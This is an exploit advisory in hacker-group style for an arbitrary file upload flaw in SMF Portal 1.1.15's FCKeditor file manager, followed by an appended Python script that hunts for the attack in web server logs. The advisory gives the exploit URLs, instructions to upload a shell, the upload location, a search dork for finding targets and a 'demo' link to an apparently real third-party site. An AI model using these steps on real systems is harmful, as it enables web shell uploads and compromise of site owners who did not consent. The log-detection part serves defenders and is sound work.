In The Name Of GOD
==============================================================================
SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability
==============================================================================

[»] Title    : [ SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ]
[»] TestedON : [ LINUX ]
[»] Download : [ http://www.simplemachines.org/ ]
[»] Author   : [ HELLBOY ]
[»] Email    : [ A68_HELLBOY@YAHOO.COM ]
[»] Date     : [ 2011-12-2 ]
[»] Version  : [ 1.1.15 ]
[»] Dork     : [ "Powered by SMF 1.1.15" ]

###########################################################################

InformatioN :

1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
2. Select your shell and click OK.
3. Formats that can be uploaded (Php6, Jpg, gif, Xml, ...)
4. Uploaded File Location : Target.com/tp-images/File/File Name

###########################################################################

===[ Exploit ]===

[»] http://Target/[path]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
[»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

===[ Demo ]===

[»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

===[ We Are : ./Iranian HackerZ ]===

Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE
TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE

###########################################################################
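
For defenders, the request pattern described above can be hunted in web server access logs. The following is an added example, not part of the original advisory: it flags access to the FCKeditor file manager, POSTs to its connector, and requests for script-type files under tp-images/File/. It assumes combined log format; the function names, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths come from the advisory; the extension list is an assumption to tune per site.
FILEMANAGER = "/fckeditor/editor/filemanager/"
UPLOAD_DIR = "/tp-images/file/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi)(\.|$)")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Dec/2011:10:00:01 +0000] "GET /FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 5120
192.0.2.10 - - [02/Dec/2011:10:00:09 +0000] "POST /FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Type=File HTTP/1.1" 200 310
192.0.2.10 - - [02/Dec/2011:10:00:15 +0000] "GET /tp-images/File/report.php6 HTTP/1.1" 200 42
198.51.100.7 - - [02/Dec/2011:10:01:00 +0000] "GET /tp-images/File/logo.jpg HTTP/1.1" 200 20480
198.51.100.7 - - [02/Dec/2011:10:01:02 +0000] "GET /index.php?topic=12.0 HTTP/1.1" 200 8800
""".splitlines()


def classify(line):
    """Return (client, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, _status = m.groups()
    # Decode and lowercase the path so encoded or mixed-case requests still match.
    path = unquote(urlsplit(target).path).lower()
    if FILEMANAGER in path:
        if method == "POST" and "/connectors/" in path:
            return client, "upload-via-connector"
        return client, "filemanager-access"
    # Also catches double extensions such as name.php.jpg.
    if UPLOAD_DIR in path and SCRIPT_EXT.search(path.rsplit("/", 1)[-1]):
        return client, "script-in-upload-dir"
    return None


def scan(lines):
    """All findings, in log order."""
    return [f for f in map(classify, lines) if f]


def uploaders_fetching_scripts(findings):
    """Clients that posted to the connector and also requested a script from the upload dir."""
    by_client = {}
    for client, finding in findings:
        by_client.setdefault(client, set()).add(finding)
    need = {"upload-via-connector", "script-in-upload-dir"}
    return sorted(c for c, seen in by_client.items() if need <= seen)
```

Any hit from `uploaders_fetching_scripts` is worth triage: review the contents of tp-images/File/ on that host and check whether the FCKeditor file manager is reachable without authentication.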